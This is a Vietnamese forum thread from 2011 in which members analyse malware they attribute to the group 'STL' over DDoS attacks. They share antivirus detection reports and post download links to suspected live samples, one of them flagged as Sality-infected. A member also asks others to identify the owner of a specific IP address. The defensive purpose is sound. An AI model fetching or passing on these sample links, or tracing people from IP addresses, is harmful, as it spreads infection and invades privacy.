Không cần thiết viết thêm đâu anh, chỉ cần ghi chú là bà con login hay RunAs file cmd trên với quyền Admin là được. Chạy 1 lần, press any key vài lần, sau đó login vào user thường dùng, chạy 1 lần, press any key vài lần nữa là xong. - taskkill: Kill process đang run của exe cần del. - sc delete: Delete service mà exe cần kill đăng ký - Xong xuôi, del nó đi là vừa. Em xin báo cáo với mấy anh stl, Avira vừa report về cho em, toàn bộ AcrobatUpdater.exe, SbieSvc.exe, SbieMgm.dll mà em đã up cho Avira đã được Avira báo là "mèo què". 1. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=806250 2. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=806248 Thêm nữa, chiều nay, KIS của em tự đông nhai xương hết toàn bộ mấy file trên trong thư mục: Virus\STL trên máy em rồi. Từ từ rồi toàn bộ 100% các "mèo què" của mấy anh sẽ bị các AVs phổ biến tiêu diệt hết. Thử xem lúc đó mấy anh còn "đốt chích" được ai. PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

sonngh wrote:

vndncn wrote:

Lam sao submit cac mau virus cua anh TQN len cac trang antivirus vay ban, chi dum minh cach up voi? Cam on.
vào các link bên dưới nhiều người gởi mẫu độ tin cậy càng cao . Avira : http://analysis.avira.com/samples/index.php KIS : http://support.kaspersky.com/virlab/helpdesk.html Microsoft Security Essentials : https://www.microsoft.com/security/portal/Submission/Submit.aspx

Email em có kết quả trả lời của Microsoft về những files virus STL được upload lên mediafire bởi anh TQN rồi nè mấy anh ơi. Analysis of the file(s) in Submission ID MMPC11082119831261 is now complete. This is the final email that you will receive regarding this submission. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 8/21/2011 8:26:46 AM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11082119831261 Submitted Files ============================================= SbieSvc.exe [Trojan:Win32/Vietak.A] The following links contain more information regarding the detections listed above: http://go.microsoft.com/fwlink/?linkid=95666&Entry.aspx&name=Trojan:Win32/Vietak.A Your submission was scanned using antimalware definition version 1.111.426.0.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

TQN wrote:

Không cần thiết viết thêm đâu anh, chỉ cần ghi chú là bà con login hay RunAs file cmd trên với quyền Admin là được. Chạy 1 lần, press any key vài lần, sau đó login vào user thường dùng, chạy 1 lần, press any key vài lần nữa là xong. - taskkill: Kill process đang run của exe cần del. - sc delete: Delete service mà exe cần kill đăng ký - Xong xuôi, del nó đi là vừa. Em xin báo cáo với mấy anh stl, Avira vừa report về cho em, toàn bộ AcrobatUpdater.exe, SbieSvc.exe, SbieMgm.dll mà em đã up cho Avira đã được Avira báo là "mèo què". Thêm nữa, chiều nay, KIS của em tự đông nhai xương hết toàn bộ mấy file trên trong thư mục: Virus\STL trên máy em rồi. Từ từ rồi toàn bộ 100% các "mèo què" của mấy anh sẽ bị các AVs phổ biến tiêu diệt hết. Thử xem lúc đó mấy anh còn "đốt chích" được ai. PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))

lại còn dám doạ nạt cả thường dân vô tội . Đúng là người làm chuyện nhớn có khác chả từ thủ đoạn nào cả, nếu như chúng nó có bộ phận đảm nhiệm việc chuyên đi doạ nạt người khác thì không nó làm gì.Còn vì bức xúc với việc bị tụt quần code mà đem lòng ghen ghét hay (sợ hãi) gì thì đúng là bọn đầu lợn :)). người đã làm thì không sợ mà nếu sợ chúng nó thì đã chả dám làm. @TQN : hôm trước em tập RCE mấy cái File jad tìm được web này có khá nhiều tool RCE http://www.woodmann.com chia sẻ mọi người cùng tham khảo Link Tham khảo các Tool : http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn vndncn. Nhắc mới nhớ, mình có thằng bạn nằm vùng trong giới RCE, đang làm trong team Windows Defender. Hì hì, gởi riêng cho nó toàn bộ "mèo què" của mấy anh stl này mới được. Hỏi riêng mấy anh stl cái: Em gởi mẫu cho MS có bị cấm, bị bắt không mấy anh ? Không thì mấy anh chụp mũ em tiết lộ bí mật xxx, thông tin xxx gì đó nữa, tội em lắm ? Bà con nào biết, kiểm tra giùm em IP 113.172.223.104 (IP của VDC), lúc 2:39 chiều, ngày hôm nay: 22-08-2011, là của thằng nào ? PM riêng cho em nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

TQN wrote:

PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))

Giỏi mà tối ngày lo code virus, malware... bị ai sai đâu đánh đó, rồi lo tìm cách lây nhiễm malware vào máy tính người khác( nhất là đồng bào VN không hiểu nhiều về máy tính) bằng nhiều hình thức gian tà, xảo huyệt.. của mấy anh để rồi chơi trò DDOS bẩn thỉu, hèn hạ của mấy anh ---> Mấy anh stl sao mà độc ác quá vậy, mấy anh có phải là con người không?--> Sống mà theo sự sắp đặt của kẻ khác thì sống có ý nghĩa gì chứ. Đấu kỷ thuật không lại rồi hù doạ anh em HVA àh --> đồ hèn hạ, mấy anh stl phải nên biết rằng: Thiên ngoại hữu thiên, nhân ngoại hữu nhân" chứ... Anh TQN, anh nên cẩn thận với bọn stl nhe anh.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem — GMT

Em phát hiện GoogleCrashHandler.exe không có digital đây. Nhờ mọi người xem giúp. http://www.mediafire.com/file/ql94xm0w3fs9gmg/GoogleCrashHandler.exe

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

TQN wrote:

Cảm ơn vndncn. Nhắc mới nhớ, mình có thằng bạn nằm vùng trong giới RCE, đang làm trong team Windows Defender. Hì hì, gởi riêng cho nó toàn bộ "mèo què" của mấy anh stl này mới được. Hỏi riêng mấy anh stl cái: Em gởi mẫu cho MS có bị cấm, bị bắt không mấy anh ? Không thì mấy anh chụp mũ em tiết lộ bí mật xxx, thông tin xxx gì đó nữa, tội em lắm ? Bà con nào biết, kiểm tra giùm em IP 113.172.223.104 (IP của VDC), lúc 2:39 chiều là của thằng nào ? PM riêng cho em nhé !

anh Tờ Quy Anh ơi, anh có cần ngươi theo bảo vệ anh không vậy? Em kêu mấy thằng đàn em của em theo bảo vệ anh nha.Em là trùm giang hồ quận 4 đây,có thằng nào hó hé anh cứ kêu em bảo kê cho nha:-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn Semperidem. Chắc đúng rồi đó em, mẫu mới, build ngày 07/07/2011, mới toanh nhất. Cũng code theo kiểu C++ dùng CString của VS 2008. Còn thiếu một file quan trong nữa, em search trên máy tìm thấy GoogleCrashHandler.exe đó, file goopdate.dll, up lên liền nhé. Tôi đợi, vì ngày mai tôi phải đi xa vài ngày rồi. Có file này thì hy vọng sẽ lòi ra nguồn ddos server của stl vào vietnamnet.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Anh em ai có khả năng thì cố gắng học hỏi để hỗ trợ anh TQN nhé :D Để xem STL được hậu thuẫn đến bao giờ =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

Em có một thắc mắc không biết đúng hay sai, vì theo những gì mấy anh phân tích thì em không hiểu lý do gì mà STL ( chỉ là nghi ngờ vì chưa có bằng chứng cụ thể ) lại tấn công DDOS vietnamnet. Và cho em hỏi luôn là băng thông của vietnamnet so với HVA thế nào ??, có hay không việc lấy vietnamnet làm quân xanh dể tập trận trước khi quay lại DDOS HVA với cường độ lớn hơn?? ( hì chỉ là giả thuyết do em ngủ không được đặt ra thôi )

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Bạn ko biết/hiểu thì nên theo dõi hoặc đọc lại từ page 1, đừng nhảy bổ vào rồi băn khoăn cái kiểu chưa chắc là STL này nọ v.v... Đi tắt trong CNTT ko thành công đc đâu

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

angel_of_devil wrote:

Bạn ko biết/hiểu thì nên theo dõi hoặc đọc lại từ page 1, đừng nhảy bổ vào rồi băn khoăn cái kiểu chưa chắc là STL này nọ v.v... Đi tắt trong CNTT ko thành công đc đâu

sao bạn giám chắc là mình không theo dõi từ đầu!? Mình chỉ không giám khẳng định một cách chắc chắn 100% bạn ạh, dù bạn có nghi ngờ và có bằng chứng 99% thì cũng không phải là 100% mà đúng không nào!! Mình hỏi ở trên vì chỉ có chút thắc mắc nhỏ nhỏ vậy thôi!!

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

texudo wrote:

Qua thông tin X-Cafe và IP, search ra một đống Domain với IP bắt đầu bằng 91.211.116.*. http://bgp.he.net/net/91.211.116.0/22#_dns Chính xác là SINHTULENH rồi: 91.211.116.185 sinhtulenh.org, sinhtuphu.org

Mình dám khẳng định bạn ko đọc từ đầu, mà có đọc thì cũng qua quýt hời hợt, đọc mà như ko!

Phân tích tính chất vài trận DDoS HVA vừa qua.

wỷnhỏ — GMT

TQN wrote:

Bà con nào biết, kiểm tra giùm em IP 113.172.223.104 (IP của VDC), lúc 2:39 chiều, ngày hôm nay: 22-08-2011, là của thằng nào ? PM riêng cho em nhé !

hờ hờ....cái kiểm tra Ip này thì mấy a từ Smod trở lên là kiểm tra được mà a.bảo mấy a đó kiểm tra giúp cho :):):) hj`.mà a cứ "công khai việc xấu" của tụi nó lên thế này không sợ tụi nó thù dzai rùi hum nào oánh lẻ a ak??? :D:D:D à mà lần trước em có hỏi là cái Unikey cúa em bị dính virus (em là mem mới tìm hiểu CNNT) nhưng không diệt được là sao a?? bài của em bị move đi đâu ấy :(:(

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Tình hình vừa rồi cái hotmail của em để quản lý đống domain của công ty cũng bị lock vì bị truy cập từ ip nước ngoài. phải nhờ bạn bên US để unlock giùm. Hôm nay em đang truy cập facebook thì thấy thông báo tài khoản bị khoá tạm thời, ip truy cập là 74.199.77.67 các bro kiểm gia giùm em xem có dính dáng gì đến mấy bro STL hem. Em vừa phải đồng loạt đổi mật khẩu toàn bộ các account. mệt quá

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))

Hì hì, coi chừng có ông nội nào tát nước theo mưa đó em. Anh không nghĩ stl con nít và sơ suất đến độ tức khí mà lên cái blog của em để comment. Nếu quả thật mấy bạn stl mà chơi trò hù doạ trên blog như thế này thì chứng tỏ mấy bạn đó đi tới chỗ cùng kiệt rồi đó. Hù doạ là hành động thể hiện sự bất lực. Chỉ có điều mấy anh em ở HVA chả làm cái gì phi pháp hết. Tất cả đều công khai, giấy trắng mực đen, bằng chứng còn rành rành ra đó. Sẵn tiện nói luôn để mấy bạn stl biết là loạt RE này trên HVA không chỉ có dân kỹ thuật người Việt mà cả dân malware analysis thứ thiệt chú ý. Cả google, mcAfee, Sophos, Avira, Microsoft và một số nhóm nghiên cứu malware đang theo dõi rất sát (chỉ có bkis là im re, hì hì). Các bạn stl muốn chơi "bạch hoá" hả? HVA chơi RE lai rai như vầy là văn nghệ lắm rồi chớ chơi thấu cáy kiểu oanh tẹc na sô nan thì mệt á. Đến lúc đó, chính các bạn sẽ bị rớt vô chỗ "đem con bỏ chợ", "vắt chanh bỏ vỏ" đó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tình hình rất ừ là tình hình, đang ngồi trên máy chờ bà con tìm và up goopdate.dll lên nè, bà con ơi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

superbmt — GMT

máy e cũng có tìm thấy file goopdate.dll như anh nói, nhưng em kiểm tra file GoogleCrashHandler.exe thì vẫn có Digital signatures...nên e nghĩ chắc là không bị dính mèo què của stl đâu pk anh? e chạy tool anh viết cũng file not found

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cứ up lên mediafire hay đâu đó đi em. Cái bat file anh viết đâu có tìm GoogleCrashHandler đâu ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

sgdo — GMT

Đây là file của mình(goopdate.dll)cũng có Digital signatures http://www.mediafire.com/?zlymlnzy3fvvmrx

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

conmale wrote:

TQN wrote:

PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em :-( :-( :-) =))
Hì hì, coi chừng có ông nội nào tát nước theo mưa đó em. Anh không nghĩ stl con nít và sơ suất đến độ tức khí mà lên cái blog của em để comment. Nếu quả thật mấy bạn stl mà chơi trò hù doạ trên blog như thế này thì chứng tỏ mấy bạn đó đi tới chỗ cùng kiệt rồi đó. Hù doạ là hành động thể hiện sự bất lực. Chỉ có điều mấy anh em ở HVA chả làm cái gì phi pháp hết. Tất cả đều công khai, giấy trắng mực đen, bằng chứng còn rành rành ra đó. Sẵn tiện nói luôn để mấy bạn stl biết là loạt RE này trên HVA không chỉ có dân kỹ thuật người Việt mà cả dân malware analysis thứ thiệt chú ý. Cả google, mcAfee, Sophos, Avira, Microsoft và một số nhóm nghiên cứu malware đang theo dõi rất sát (chỉ có bkis là im re, hì hì). Các bạn stl muốn chơi "bạch hoá" hả? HVA chơi RE lai rai như vầy là văn nghệ lắm rồi chớ chơi thấu cáy kiểu oanh tẹc na sô nan thì mệt á. Đến lúc đó, chính các bạn sẽ bị rớt vô chỗ "đem con bỏ chợ", "vắt chanh bỏ vỏ" đó.

em nghĩ sau cái vụ này HVA sẽ nổi danh trong giới võ lâm giang hồ đó nha,mà một phần cũng cám ơn mấy anh stl "sờ mong lợn" :-) có khi mình phải đãi tiệc ở NewWord để cám ơn mấy anh stl đó, nha mấy anh em. :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thông tin thêm: http://www.exe-dll.com/process/googleupdate.exe.htm Các bạn chú ý cái link abobeupdate.com, đọc lại topic đầu tiên RCE virus của stl sẽ thấy cái link này. Các bạn search và up GoogleUpdater.exe, GoogleCrashHandler.exe, goopdate.dll.

Phân tích tính chất vài trận DDoS HVA vừa qua.

superbmt — GMT

đây là 3 file của em.. http://www.mediafire.com/?1ahac0g3dwtq8

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Tản mạn và tò mò với vietnamnet.net (just for fun) Như các bạn đã biết, HVA đang cố gắng và quyết tâm tìm ra con STL bot và DDoS tool của nó đang tấn công DDoS vào trang mạng vietnamnet. Có sự giúp sức nhiệt tình của các bạn như vừa qua, thì HVA (chủ công là TQN) sẽ tìm ra thôi Mấy ngày gần đây theo dõi trên mang, chúng ta luôn thấy tình trang khó hay không truy cập đươc vào vietnamnet. Luôn hiện ra HTTP error code 503- Service unavailable (Dịch vụ không sẵn sàng đáp ứng cho người truy cập)' Lỗi 503 là lỗi về phía server (webserver) mà nguyên nhân chính là do nó bị quá tải (overload). Đọc một bài của TQN trong topic này, thấy thông báo là DDoS tool của STL tấn công vào một URL nằm "sâu" trong website, đó là URL: http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html tôi hơi ngạc nhiên. Theo dõi diễn biến nhiều quá trình DDos tại VN và thế giới, tôi thấy rất ít khi mang bot tấn công vào một URL (trang web) nằm "sâu" đến thế, thường chúng chỉ tấn công vào trang mở đầu (thường là trang chủ) chủ hay trang kế tiếp. Có nhiều lý do, trong đó có lý do là hacker phải mất nhiều thời gian để xem toàn bộ nội dung của website, để tìm ra đúng trang (URL) cần đánh. DDoS hacker bình thường thì chả ai mất công tìm tòi như vậy cả. Chỉ có "Political DDoS" thì có thể (từ mới chế của PXMMRF-HVA đấy nhé) Hôm nay (23-8-2011), vào vietnamnet.net xem, thấy truy cập hơi chậm. Chắc vietnamnet lại bị STL tân công DDoS đây, nhưng cường độ không cao. Hay chưa đến lúc cao nhỉ? Hỉ hì. Có 3 tiểu mục quan trong ở dưới một cửa sổ Flash trên trang chủ:

.Chủ tịch nước: Tên tuổi Tướng Giáp mãi đi vào lịch sử .Biểu tình ở Đại Liên và tiếng nói người dân .Đừng để có nhiều 'nghị sĩ rau muống'

Các tiểu muc này truy cập để xem rất khó và rất chậm so với các muc khác trên trang chủ. Tiểu mục 1 (Chủ tịch nước: Tên tuổi Tướng Giáp mãi đi vào lịch sử) thì đặt ở directory: http://vietnamnet.vn/vn/chinh-tri/36413/chu-tich-nuoc--ten-tuoi-tuong-giap-mai-di-vao-lich-su.html , tiểu mục 3 thì ở: http://vietnamnet.vn/vn/chinh-tri/36384/dung-de-co-nhieu--nghi-si-rau-muong-.html . Hai tiễu muc này truy cập đến rất chậm, nhưng bài viết vẫn còn hiện ra được, sau khi kiên nhẫn chờ đợi. Còn tiểu mục 2: Biểu tình ở Đại Liên và tiếng nói người dân (có vẻ nhạy cảm đây!) , thì không thể nào truy cập được, chờ lâu không hiện ra một chữ, luôn time-out. Nghĩa là: wait for nothing. Chắc là tiểu mục 2 này nằm ở directory: http://vietnamnet.vn/vn/chinh-tri/36xxx/bieu-tinh-o-dai-lien-va-tieng-noi-nguoi-dan.html? Không rõ có phải các bác STL có đang nhằm DDoS vào đúng trang (URL) này không? Y như các bác đã làm trường hợp tấn công website danlambao ấy, như nói ở trên. Tất nhiên chỉ có các admin. của Vietnamnet mới trả lời chính xác câu hỏi này. Đúng không các bác?

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Các file mà Semperidem, sgdo, superbmt vừa gửi đều là của Google cả, không phải virus STL.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv (Chú ý: Các bạn không nên dơwnload File GoogleUpdate.exe này về máy, trừ khi muốn nghiên cứu một virus khác, virus "Sality". Virus Sality có đăc điểm khi nhiễm vào máy sẽ tìm tất cả các file .exe trong máy và nhân bản virus. Virus lấy tên file nguyên bản mà nó vừa nhiễm vào. Vì vậy trong máy sẽ đầy rẫy các nhân bản virus Sality và hệ thông sẽ ngưng chạy-PXMMRF-HVA)

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

Hi anh em, Mình nghĩ rằng, anh em nên tập trung chuyên môn RCE hay giúp đỡ các anh admin,TQN một tay chứ chúng ta không nên quan tâm nhiều các trang lề trái vì có thể nó sẽ làm ảnh hưởng đến HVA.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

mv1098 wrote:

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv

Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

conmale wrote:

mv1098 wrote:

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha?

Xin lỗi file này của em bị hỏng, chờ chút em update

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

template wrote:

Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác

Có chữ ký là đồ xịn, không cần upload bồ ơi. :).

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

template wrote:

Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác

Kiểm tra ra kết quả như hình sau thì khỏi upload:

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

PXMMRF wrote:

Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.

TQN wrote:

Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???

Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết!

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

ptv_vbhp wrote:

PXMMRF wrote:

Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.

TQN wrote:

Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết!

Screenshot giao diện BKAV lúc nó diệt dc chính xác các file của STL ( toàn bộ ) theo bồ nói rồi up lên đây

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

ptv_vbhp wrote:

PXMMRF wrote:

Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.

TQN wrote:

Bà con BKAV có thể giúp mọi người được không ? Hay là cứ giả câm, giả điếc, nhắm mắt làm ngơ ???
Hic em có thấy mẫu nào của STL mà Bkav ko diệt được đâu nhỉ ? :D . Em dùng Bkav pro thấy diệt hết!

Bồ khoái tiếp thị cho BKIS quá hả? Bồ chỉ có mấy bài trên diễn đàn nhưng chủ yếu là "giả nai" và quảng cáo cho BKIS. Hỏi thử BKAV làm cái gì cho tình trạng của vietnamnet trước đây và ngay bây giờ hở? Đừng làm cho thiên hạ thêm ác cảm vói BKIS.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

mv1098 wrote:

conmale wrote:

mv1098 wrote:

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha?
Xin lỗi file này của em bị hỏng, chờ chút em update

Coi chừng dll này bị locked. Em thử boot vô safemode rồi mới copy nó. Bảo đảm hơn thì boot bằng HirenCD rồi mới zip nó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

conmale wrote:

template wrote:

Mình kiểm tra tất cả đều có chữ ký, không cần up đúng ko bác
Có chữ ký là đồ xịn, không cần upload bồ ơi. :).

Cẩn tắc vô áy náy anh, bài học về Stuxnet sử dụng chữ ký của Realtek vẫn còn đấy :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

mv1098 wrote:

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv (Chú ý: Các bạn không nên dơwnload File GoogleUpdate.exe này về máy, trừ khi muốn nghiên cứu một virus khác, virus "Sality". Virus Sality có đăc điểm khi nhiễm vào máy sẽ tìm tất cả các file .exe trong máy và nhân bản virus. Virus lấy tên file nguyên bản mà nó vừa nhiễm vào. Vì vậy trong máy sẽ đầy rẫy các nhân bản virus Sality và hệ thông sẽ ngưng chạy-PXMMRF-HVA)

Lâu lâu mới vào forum, anh em post nhộn nhịp quá :D Trong khi chờ toàn bộ file mới của GoogleCrashHandle thì em tải file này về phân tích thử, xem Sality là virus gì mà thấy các hãng phải có tool riêng để remove. Phải đổi gió chút, code của stl RE mãi cũng chán, vì lần nào cũng giống nhau cả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

minh2010 — GMT

conmale wrote:

mv1098 wrote:

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv
Em tìm thử trên máy có "goopdate.dll" không? Có con nào, zip hết rồi upload lên giúp nha?

Anh conmale ơi, anh xem cái này ở máy em sao anh nhé ! Em ko úp lên MF được ạ. http://share.vnn.vn/dl.php/4666724

Phân tích tính chất vài trận DDoS HVA vừa qua.

Thiện Ngộ — GMT

Đây là file trên máy mình. Check dùm nhé. Thanks http://up.4share.vn/f/33020a010306070b/goopdate.rar

Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem — GMT

http://www.mediafire.com/?fbffz39h68qm7wu Em xin lỗi vì hôm qua đưa không kịp thời. đây là goopdate.dll của em, em chưa zip ạ.:D

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

chả hiếu bọn STL tiềm năng của nó đến đâu ??? hay nó đang chỉ dùng đòn giương đông kích tây hoặc trò gì đó mà đợt gần đây cả vietnamnet và trang web đề cập ở đây http://www.bbc.co.uk/vietnamese/vietnam/2011/08/110823_viettan_ddos.shtml cũng bị tấn công. Ai có thông tin gì thêm thì post cho mọi người với

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

Em lại vừa nhận được 2 email từ Microsoft về việc phân tích file "FakeSandboxie_17_08_2011.zip" của anh TQN đây mấy anh. Email thứ 1 lúc 18:27 Thứ Ba, 23 tháng 8 2011 The Microsoft Malware Protection Center (MMPC) strives to keep you informed about the status of your submission. This email communicates what we currently know about the file(s) you submitted. You can view your submission online at http://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=C6AE557B-E5E7-4A5A-9C55-87A04A575689 This information is subject to change pending our analysis and a final email response will be sent to you when analysis is complete and definition updates have been published. If you were to scan the files you submitted using one of Microsoft's Antimalware products such as Microsoft Forefront Client Security or Microsoft Security Essentials, you would see relevant detection information similar to what is displayed below. Submitted Files ============================================= FakeSandboxie_17_08_2011.zip [Trojan:Win32/Vietak.A] +---LoadDLL.exe [Not Malware] +---fytqn613.bin [Changes to detection currently undergoing testing] +---SbieSvc.exe [Trojan:Win32/Vietak.A] +---flower.bin [Not Malware] +---flower.bmp [Not Malware] +---fytqn613.bmp [Not Malware] +---fytqn613.idb [Not Malware] +---monitor.cmd [Not Malware] +---SbieMgm.dll [Changes to detection currently undergoing testing] +---SbieMgm.idb [Not Malware] +---SbieMgm_patched.dll [Not Malware] +---SbieSvc.idb [Not Malware] +---showthread.php [Not Malware] +---showthread_decoded.txt [Not Malware] +---tracker.cmd [Not Malware] The following links contain more information regarding the detections listed above: http://go.microsoft.com/fwlink/?linkid=95666&Entry.aspx&name=Trojan:Win32/Vietak.A Email thứ 2 lúc 19:08 Thứ Ba, 23 tháng 8 2011 Analysis of the file(s) in Submission ID MMPC11082298281125 is now complete. This is the final email that you will receive regarding this submission. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 8/22/2011 1:36:28 AM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11082298281125 Submitted Files ============================================= FakeSandboxie_17_08_2011.zip [Trojan:Win32/Vietak.A] +---LoadDLL.exe [Not Malware] +---fytqn613.bin [Trojan:Win32/Vietak.A] +---SbieSvc.exe [Trojan:Win32/Vietak.A] +---flower.bin [Not Malware] +---flower.bmp [Not Malware] +---fytqn613.bmp [Not Malware] +---fytqn613.idb [Not Malware] +---monitor.cmd [Not Malware] +---SbieMgm.dll [Trojan:Win32/Vietak.A] +---SbieMgm.idb [Not Malware] +---SbieMgm_patched.dll [Not Malware] +---SbieSvc.idb [Not Malware] +---showthread.php [Not Malware] +---showthread_decoded.txt [Not Malware] +---tracker.cmd [Not 